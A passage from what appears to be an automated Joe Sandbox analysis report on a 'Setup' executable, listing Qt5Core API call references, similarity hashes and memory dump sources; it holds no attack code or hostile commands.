                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9E28
                                                                                                                                                                • Part of subcall function 00007FFBA19D9BF0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,000000E8,00007FFBA19D9E57,?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9C30
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Logger@@Message$?warning@BasicCategory@@Enabled@H00@LoggingTimer@@Warning
                                                                                                                                                              • String ID: Invalid session window size
                                                                                                                                                              • API String ID: 3560238351-2314003836
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2416D
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2417E
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241A2
                                                                                                                                                              • ?fromBase64@QByteArray@@SA?AV1@AEBV1@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241B0
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241C0
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241CB
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241D6
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$?fromBase64@BasicDateString@@Time@@Timer@@V0@$$V0@@V1@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1593142784-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@V0@@$?setDateMode@1@@ParsingTime@@$BasicFragment@Password@Timer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 269014786-0
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@?dispose@Data@1@@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3322671543-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$?dispose@Data@1@@Data@@List
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2030119362-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B0E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B2C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B55
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B60
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B6B
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B76
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 554220883-0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                                • Part of subcall function 00007FFBA1987E40: ??0QIODevicePrivate@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987E4D
                                                                                                                                                                • Part of subcall function 00007FFBA1987E40: ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987EB6
                                                                                                                                                                • Part of subcall function 00007FFBA1987E40: ??0QVariant@@QEAA@_N@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987F13
                                                                                                                                                                • Part of subcall function 00007FFBA1987E40: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1987F41
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE ref: 00007FFBA1988C9D
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1988CEC
                                                                                                                                                              • ??0QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1988D28
                                                                                                                                                                • Part of subcall function 00007FFBA1984AD0: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1984B55
                                                                                                                                                              • ?toBool@QVariant@@QEBA_NXZ.QT5CORE ref: 00007FFBA1988D49
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1988D59
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1988D64
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Mutex@@$Bool@DevicePrivate@@String@@V0@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3068780738-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@$malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2645771327-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CD42
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CD5D
                                                                                                                                                                • Part of subcall function 00007FFBA1A36930: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36948
                                                                                                                                                                • Part of subcall function 00007FFBA1A36930: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3696D
                                                                                                                                                                • Part of subcall function 00007FFBA1A36930: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36984
                                                                                                                                                                • Part of subcall function 00007FFBA1A368C0: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A368D8
                                                                                                                                                                • Part of subcall function 00007FFBA1A368C0: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A368FD
                                                                                                                                                                • Part of subcall function 00007FFBA1A368C0: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36914
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??0QDate@@QEAA@HHH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A36E98
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??0QTime@@QEAA@HHHH@Z.QT5CORE ref: 00007FFBA1A36EBE
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??0QDateTime@@QEAA@AEBVQDate@@AEBVQTime@@W4TimeSpec@Qt@@@Z.QT5CORE ref: 00007FFBA1A36ED6
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ?addSecs@QDateTime@@QEBA?AV1@_J@Z.QT5CORE ref: 00007FFBA1A36EE7
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A36EF4
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A36EFE
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??0QDateTime@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A36F0B
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A36F15
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CDB2
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CDBD
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CDDC
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CDE7
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36478
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3649D
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A364B4
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time@@$Date$Logger@@Message$V0@@$?warning@Category@@Enabled@H00@LoggingV0@$$Warning$Date@@$?addA@$$Array@@ByteQt@@@Secs@Spec@String@@TimeV1@_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3088503744-0
                                                                                                                                                              • Opcode ID: 6dab6fa66d0e8df75777198526b142582ef3becd6902c1e4de11fe8282f9f39f
                                                                                                                                                              • Instruction ID: 1f98b89ee6dfaa9647a33dddb1bb64427dd317b5821546f7ee49644d8029fc44
                                                                                                                                                              • Opcode Fuzzy Hash: 6dab6fa66d0e8df75777198526b142582ef3becd6902c1e4de11fe8282f9f39f
                                                                                                                                                              • Instruction Fuzzy Hash: 412171A6A0E64281EB42EB25E8501BAA361FF85BD0F840033EE9D4775AEF2CD545CF10
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@$?data@Char@@$?cend@?resize@?size@Initialization@Qt@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3254343722-0
                                                                                                                                                              • Opcode ID: 6fa3ff44a7b80bff04de55143e7de199284f0b7184df7522e2f0d56c82003eaf
                                                                                                                                                              • Instruction ID: 690b4a3ba35f05664c67a46ae311920ac0a3f44416bf272426a015065f9e9862
                                                                                                                                                              • Opcode Fuzzy Hash: 6fa3ff44a7b80bff04de55143e7de199284f0b7184df7522e2f0d56c82003eaf
                                                                                                                                                              • Instruction Fuzzy Hash: DC21B2A670A69186DB458F32E554179BBA1FF89FD4B48C031DE6E07714EE3DD44ACB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2163F
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21655
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21674
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21683
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21694
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A216AA
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$?allocate@AllocationData@@@@@Flags@Option@U1@_$memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1619863973-0
                                                                                                                                                              • Opcode ID: f014c3316b9fb98ecc44e87c2420ac0b39badbde606f81a2ffc3a509255359cf
                                                                                                                                                              • Instruction ID: a3c31f4a297b08e17bca8f8c79f96163e624788c5d46bee923502c0d3b890083
                                                                                                                                                              • Opcode Fuzzy Hash: f014c3316b9fb98ecc44e87c2420ac0b39badbde606f81a2ffc3a509255359cf
                                                                                                                                                              • Instruction Fuzzy Hash: 9A31A272606A4186DBA1CF26E48016D77A0EB84FA4B28C132DE6D877A0EF3DD445CF00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListString@@$FindObject@@$?begin@?dispose@?end@?qt_qChildChildren_helper@@Data@1@@Flags@List@MetaOption@Qt@@@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2432269031-0
                                                                                                                                                              • Opcode ID: 1b5d0e9cff818f5acebfaa74b06266a75ca115e808ba74cb5e7480eae2dea33d
                                                                                                                                                              • Instruction ID: fd6a2c15dfcea7036a2294f8d5e2ada89cd2ba5405a70cceca0858479d638c8e
                                                                                                                                                              • Opcode Fuzzy Hash: 1b5d0e9cff818f5acebfaa74b06266a75ca115e808ba74cb5e7480eae2dea33d
                                                                                                                                                              • Instruction Fuzzy Hash: C1218F7660AA4682EF828F65E450178B360FF84BA8F544132DE5E077A4EF7CD44ACF00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$?set$Parent@U1@@$?color@?createArray@@ByteColor@Color@1@Color@1@@DataNode@U2@_V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 485551508-0
                                                                                                                                                              • Opcode ID: 703937539ab84d4ae22bbadb6ac05fc854437c87643de35da0c6cf114afc309e
                                                                                                                                                              • Instruction ID: 30179eba1908ca3fb3ae62787d9e043cb2e34a1d96b223c10e2dca2c24818634
                                                                                                                                                              • Opcode Fuzzy Hash: 703937539ab84d4ae22bbadb6ac05fc854437c87643de35da0c6cf114afc309e
                                                                                                                                                              • Instruction Fuzzy Hash: 78214CB6B09651C2EB459F22E5143296361FB88F94F488535CE6E47B18EF3CD455CB40
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?end@Array@@Byte$?begin@?compare@CaseQt@@@Sensitivity@String@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 798693664-0
                                                                                                                                                              • Opcode ID: 1d824f8822361c1d77f5332aa3452de0632f28e6e9c2e0f35e26cbb5ac1ae1b9
                                                                                                                                                              • Instruction ID: 2ccef381a246a1b1a6f84be7f85435e93a7a3e71f2fb0305ac976cce058919a0
                                                                                                                                                              • Opcode Fuzzy Hash: 1d824f8822361c1d77f5332aa3452de0632f28e6e9c2e0f35e26cbb5ac1ae1b9
                                                                                                                                                              • Instruction Fuzzy Hash: 3D117262B0AA4182DB51CB26E8041A967A0FF88FD4F084432DE9E0BB95DF3CD055CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D72
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D7C
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D86
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D90
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D9A
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980DA4
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$DateTime@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 664682113-0
                                                                                                                                                              • Opcode ID: ebadccea1bfe4e50052a770a113d425f8a187ab3a3460fb06357b8d2d56934ed
                                                                                                                                                              • Instruction ID: 4c5fb6c73992ce709d79660214d7f79f65e9321464ecf324c31f7bf89f57c9fb
                                                                                                                                                              • Opcode Fuzzy Hash: ebadccea1bfe4e50052a770a113d425f8a187ab3a3460fb06357b8d2d56934ed
                                                                                                                                                              • Instruction Fuzzy Hash: 05114F62A09A4282DB829F35E9441BD7361FF54BA8F484031DE5E07698DF2CE896CB40
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Time@@$V0@@$?currentTimeUtc@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2730630338-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A240CC
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A240D8
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A240EA
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A240F7
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24103
                                                                                                                                                              • memcmp.VCRUNTIME140 ref: 00007FFBA1A24112
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?size@$?data@Char@@$memcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2146767703-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?host@ComponentFlags@FormattingOption@Url@@Url@@@@@$??8@DateString@@0@Time@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 749526703-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803CB
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803D5
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803DF
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803E9
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803F3
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803FD
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$DateTime@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 664682113-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA1980813
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA198081D
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA1980827
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA1980831
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA198083B
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA1980845
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$DateTime@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 664682113-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?isValid@QVariant@@QEBA_NXZ.QT5CORE(00000000,00000000,preconnect-https,00007FFBA19D502E), ref: 00007FFBA198846E
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA198852F
                                                                                                                                                              • ?freeNode@QHashData@@QEAAXPEAX@Z.QT5CORE ref: 00007FFBA198853B
                                                                                                                                                              • ?hasShrunk@QHashData@@QEAAXXZ.QT5CORE ref: 00007FFBA1988552
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA19856ED
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA1985748
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1985767
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@Hash$Variant@@$Node@$?allocate?free?has?willGrow@Shrunk@V0@@Valid@
                                                                                                                                                              • String ID: preconnect-https
                                                                                                                                                              • API String ID: 857904965-2723917305
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA197317B), ref: 00007FFBA1978A33
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978A67
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978A74
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978AAA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QSslPreSharedKeyAuthenticator*
                                                                                                                                                              • API String ID: 109532953-431481914
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA1973176), ref: 00007FFBA1979143
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1979177
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979184
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19791BA
